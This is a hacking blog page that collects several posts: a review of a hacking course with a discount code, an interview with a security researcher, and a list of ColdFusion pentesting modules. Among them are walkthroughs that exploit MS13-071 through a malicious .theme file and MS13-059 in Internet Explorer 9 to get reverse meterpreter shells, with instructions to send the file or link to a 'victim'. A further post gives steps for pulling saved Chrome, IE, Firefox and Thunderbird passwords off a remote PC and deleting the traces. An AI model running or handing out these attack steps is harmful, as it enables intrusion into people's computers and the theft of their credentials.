Learn How To Hack With HackingSchool Training

Probably most of you have heard about Udemy e-learning platform. Recently I’ve had a pleasure to take a look at Hacking School Training, which is an introductory course for anyone that is interested in learning about Ethical hacking and system security. The author does a great job covering wide variety of topics, some of them do require improvements, but overall it's a great one.

Course Content

According to the information found on the products page, there are 11 hours of content in 46 lectures containing 19 videos. A brief look at the topics is enough to say, that 11 hours is just the time you need to get through the materials. You’ll absolutely have to make the exercises , presented in the videos, on your own to consolidate the knowledge.

I wouldn't expect anyone without at least basic knowledge of Linux, networks and programming to take this course, but the required basic knowledge supplemented with this course will help you understand the principles of computer security and will provide you with solid foundations to become an expert. The course covers a broad range of topics. Even if you already have some practice e.g. in exploiting website vulnerabilities, you’ll be surprised by exploring new topics.

Linux Distro 

For those who are less experienced the most important will be the attacks, which every IT security specialist should know. The training is provided with Training Operating System, which is a LiveCD Linux distro armed with special tools, which are necessary to make the exercises. It is a great convenience that you’re already equipped with everything you need to go through the course. Simply install the system on virtual machine and start practicing.

Additionally almost all examples are presented in the videos. You’re being guided step by step how to perform an attack, beginning with fingerprinting and making research on a target, through source code compilation (if needed), exploit preparation, tools installation, ending with an attack itself.

What’s important is that the mechanisms that are being exploited are every time explained. If you don’t know yet how do networks, memory or processor registers work, you will definitely find this information in explanation of prepared attacks. You’ll find some curiosities like the history of internet as well. Luckily the course doesn’t only focus on easy topics like passwords cracking. It brings up the subjects of buffer and heap overflow attacks, webserver attacks, exploiting system kernel vulnerabilities.

All of this is supported with proof of concepts. You’re not only taught how to use the exploits, but also how to write them on your own. Eventually there is a part devoted to securing the system step by step, improving security by installing patches or by using intrusion detection systems.

So far this course has been taken by almost 500 users. There is also another course from Hacking School available on Udemy, Website Hacking in Practice, which focuses strictly on website attacks:

Summary

Personally, i feel that course is really good considering it's price i would recommend to any one who would like to get started, the best part is it being a hands on course, however there are some areas of improvements with topics like Buffer, Heap overflows which should have been covered in much detail. Also, i really liked the last part where the author explains about certain insecurities in webservers and how you should harden it.

 

30% Discount Coupon

For RHA readers, Andrew was kind enough to offer a 30% discount coupon to anyone that takes this course, Here’s the coupon code: rafaysfriend

To learn more about course curriculum and every thing else, Click Here

P.S. If you click on a link presented above, the coupon code should automatically be applied.

Hack local network PC using windows theam file.

This module exploits a vulnerability mainly affecting Microsoft
Windows XP and Windows 2003. The vulnerability exists in the
handling of the Screen Saver path, in the [boot] section. An
arbitrary path can be used as screen saver, including a remote SMB
resource, which allows for remote code execution when a malicious
.theme file is opened, and the "Screen Saver" tab is viewed. The
code execution is also triggered if the victim installs the
malicious theme and stays away from the computer, when Windows tries
to display the screensaver.

Available targets:
  Id  Name
  --  ----
  0   Windows XP SP3 / Windows 2003 SP2


msf > use exploit/windows/fileformat/ms13_071_theme
msf exploit(ms13_071_theme) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_071_theme) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_071_theme) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_071_theme) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_071_theme) > [*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.56.1\qggdxi\vleGT.scr
[*] Server started.

Then send your generated theam file to victim using \\192.168.56.1\qggdxi\vleGT.scr link ;he should open it through using smb. So tell him to put this link to run .

As soon as he open file you will get session.

Extract & decrypt Chrome & IE passwords from Remote PC

In previous post i mentioned how we can extract saved passwords from firefox & thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome & IE. If you want to know more technical detail you can visit this site.

Chrome stores all the sign-on secrets into the internal database file called 'Web data' in the current user profile folder. Newer version has moved the login passwords related database into new file named 'Login Data'.  DPAPI encrypts data based on either the DPAPI_SYSTEM values stored in LSA secrets or the user’s password, you can’t copy the database file to another machine and decrypt without using special tools as we did in case of mozilla.


First download tool ChromePasswordDecryptor from here .

Installed it in windows.We are only interested in windows binary which is located on C:\Program Files\SecurityXploded . So from that directory copy binary ChromePasswordDecryptor.exe to our main OS(Backtrack).

We are going to use two method to extract saved passwords from browser.

(A)In this method we are going to upload our binary to victim pc using meterpreter shell & then we execute it.

(1)Get meterpreter shell.

(2)Upload ChromePasswordDecryptor.exe (Which we copy into Backtract from windows) to victim.

(3)Execute it from shell using following command.
    ChromePasswordDecryptor.exe "pwd.txt"

(4)Download pwd.txt
    download pwd.txt /root

(5)Remove pwd.txt from victim & also remove uploaded binary

    rm ChromePasswordDecryptor.exe
    rm pwd.txt

(B)In this method we are going to execute it in memory ; so we do not have to upload it to victim ; but we need system priv for this method.

(1)Get meterpreter shell

(2)Get system priv.

(3)Change directory to C://windows\system32

(4)Execute it in memory using following command
execute -H -m -d calc.exe -f ChromePasswordDecryptor.exe -a "pwds.txt"

(5)download pwds.txt
    download pwds.txt /root

(6)Remove pwds.txt from victim
    rm pwds.txt

You can also used same method for IE also.Download file from here .

Extract & decrypt passwords from Firefox & Thunderbird.

Today we are going to extract password from Fireox & Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.

Most of the morden browser save information in sqlite format. When user enter login information ; firefox asked user to remember password.If user click on remember password then this passwords are saved into firefox database in signons.sqlite. But passwords are encrypted. so just by downloading signons.sqlite we can not extract passwords from it. Signons.sqlite is useless without the key3.db file, which also resides in the profile folder of your application. Passwords in the signons.sqlite file is encrypted with TripleDES in CBC mode. The key used for the encryption is saved in key3.db and encrypted as well.

Firefox Database path in windows:-

[Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Mozilla\Firefox\<random_name>.default

[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Mozilla\Firefox\<random_name>.default

Firefox Database path in linux
/root/.Mozilla/Firefox/Profile/<random_name>.default

First we have to get meterpreter shell using any known vulnerability or using any metasploit method.

Then we have to download three files from remote PC which are key3.db,signons.sqlite;cert8.db.You can use metasploit post module (use post/multi/gather/firefox_creds)for downloading this file or you can also download manually by browsing directory.

Now we have database file as well as encryption key in key3.db. So now we have to decrypt it. I can not find any third party software to decrypt this passwords for linux platform.But i found one software which is working very well in windows.Download software from here . (It will work for both Firefox & thunderbird)

(1)copy key3.db,signons.sqlite;cert8.db files in some folder which can be browse from windows.

(2)Open windows.
(3)Install that software.
(4)Open it and Just specify firefox installed path & specify folder in which we copied downloaded file.

(5)click on Start recovery button.

 

Fireox & thunderbird use same encryption technique. So you can also get thunderbird password from above mention method. Just download key3.db,signons.sqlite;cert8.db files from thunderbird folder whose path are as follow

[Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Thunderbird\Profiles\<random_name>.default

[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Thunderbird\Profiles\<random_name>.default

What is solution?

If you set master password for firefox & thunderbird then without master password ; saved passwords can not be decrypted.

An Interview With A Hacker [Shahin Ramezany]

Shahin Ramezany is a computer security researcher with over 7 years of experience in computer security, where he specializes in web application penetration, reverse-engineering/exploit-development and network penetration. Over the years he has disclosed many security vulnerabilities and authored several exploits for popular web/desktop applications.

Shahin is best known for his work on month of Abysssec undisclosed bugs (with Abysssec team), publishing 0day/1day reliable exploit codes for popular softwares, as well as finding and reporting issues in popular web sites such as Yahoo! , Microsoft, OWNcloud , Adobe , Mozilla, and so on. Shahin is also an expert Python developer and likes to automate hacking tasks via programming. His current interests are new web hacking methods, rapid code auditing techniques and security mitigation bypasses

Now a days, we have seen bug bounty hunting at the peak and XSS being low hanging fruit is found any where and lots of people i have seen is they are just injecting random payloads in POST/GET Input without knowing how XSS actually works. What do you think about them, also what according to you is the future of bug bounty hunting? 

Well , from my point of view the idea of bug bounty is cool but in most bounty programs payment is cheap for experts and in most cases credit is first motivation for those (who know what they are doing) . and about those who are doing brute force (using scanners , sending random payloads and checking reflection) they can find vulnerabilities too, because big companies have a lot of not talented (in security) developers but bounty programs will kill these kind of bounty hunters and vulnerabilities soon and about future of bounty programs i just can say if they pay well they can except to kill some serious 0days otherwise it won't work as it title. 

Why do you think that your courses stand out from the rest of the training and certification programs? 

Most of the courses in the field are though by security experts (aka defenders), who have spent a lifetime fixing and patching stuff and have only had minimal hacking experience (because its mostly illegal), but our courses are fundamentally offensive, even the theories we provide are biased towards offense and not defense.

On top of that, we have the collective experience of some of the world's most famous security researchers and the training are backed up by a company which has a lot of people actually doing penetrations and researching vulnerabilities.
To sum it up, its not a sit-get-certified program, its a tough thing with a lot of labs that makes you much more confident as a hacker.

Do you think are certifications really worth the knowledge/money? 

From the creators perspective, they are actually very cheap. The amount of labs that are virtually served and thoroughly prepared for these courses, is tremendous. The money is not even paying for that, and we're using a considerable open source community to push the thing forward.
From the students perspective, the material you learn in a course is directly correlated with the people who teach them.

Everybody can take a peek at OWASP Top 10, and then go ahead teaching how to use and defend them, but people who have spent years creating the Top 10 list, and have had millions of discussions on what to put where, definitely know all the roots to those.

How you will support your students? 

We have staff who will read all questions and feedbacks, classify them and forward them to the instructors for answers. In case some questions are out of the scope, the staff will do a brief research and guide the student in the right direction.

But the most important step is real-life scenario-based labs, which mimic actual hacking scenarios and are not classroom labs. These boost students confidence and have considerable details embedded in them.

How about your certification ? 

We are a new firm, but we are of the highest quality (check some of our sample reports), and the people we have gathered here working together are the best in their respective fields. Our certificates will soon be of very high standings. On top of that we are willing to hire most of the students that successfully pass our courses!

What are your main courses ? 

Our focus is on application security. It can be divided into web application security - which is much more unpredictable and vast - and binary application security. For web application security, we have our advanced web hacking (flagship) course, and our penetration testing course covers some of the aspects. For binary application security, we have reverse engineering courses focuses on hacking and security, and exploit development which is a tad bit more advanced.
If our audience requires it, we will provide defensive courses as well as more focused courses such as cryptography.

What about your prices?

Because this is our initial run, our prices are not too high. Our plans are to double them by the next run. To make the courses more affordable to students, we are providing discounts for early registrations. The prices are carefully prepared, for example a price of one thousand dollars for a course with more than 1000 pages of lectures, many hours of video and more than 20 full labs available on separate machines for each student, is pretty economical.

What is your material delivery? 

We are proud to say that we have prepared our material delivery for every taste! We have a survey as part of the registration that asks students to rank their experiences. Currently we support live classes (instructors teaching directly), online classes (video and lectures recorded and playable online), and downloadable classes (download watermarked lectures and videos per student), and we can provide a mixture of them.


Our labs are primarily online on a cloud and each student has his/her own separate system to meddle with, and reset to factory setting if necessary.

Last but not least, What do you think about RHA? 

About RHA i think you have great resources for beginners and you can think about some expert sections in future.

To see a complete list of trainings by Zdresearch team, Please visit the following URL:

http://training.zdresearch.com

Pentesting of coldfusion web-application.

ColdFusion is a commercial rapid web application development platform.
CFML = ColdFusion Markup Language

ColdFusion = Adobe’s product that handles CFML page/libs
– Runs on Windows, Solaris, HP/UX and Linux
– Apache, IIS, Jrun
  
Following modules are Available in metasploit for coldfusion.

msf > search coldfusion

auxiliary/gather/coldfusion_pwd_props             
auxiliary/scanner/coldfusion_rds_check                                         
auxiliary/scanner/http/cold_fusion_version                             
auxiliary/scanner/http/coldfusion_locale_traversal                 
exploit/windows/http/coldfusion_fckeditor     

Following documents are available for pentesting of coldfusion web-application

ColdFusion for Penetration Testers

Coldfusion hacking

ColdFusion Web Shell

If you have good document available for pentesting of coldfusion web-application ; please let me know. We will add it.

Exploit for IE 9 on Windows 7 SP1

This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version  9.0.8112.16446

Target
IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)

msf > use exploit/windows/browser/ms13_059_cflatmarkuppointer

msf exploit(ms13_059_cflatmarkuppointer) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set uripath /
uripath => /
msf exploit(ms13_059_cflatmarkuppointer) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_059_cflatmarkuppointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_059_cflatmarkuppointer) > [*] Using URL: http://192.168.56.1:8080/
[*] Server started.

Now send that link to victim; as soon as he open link; you will get meterpreter shell.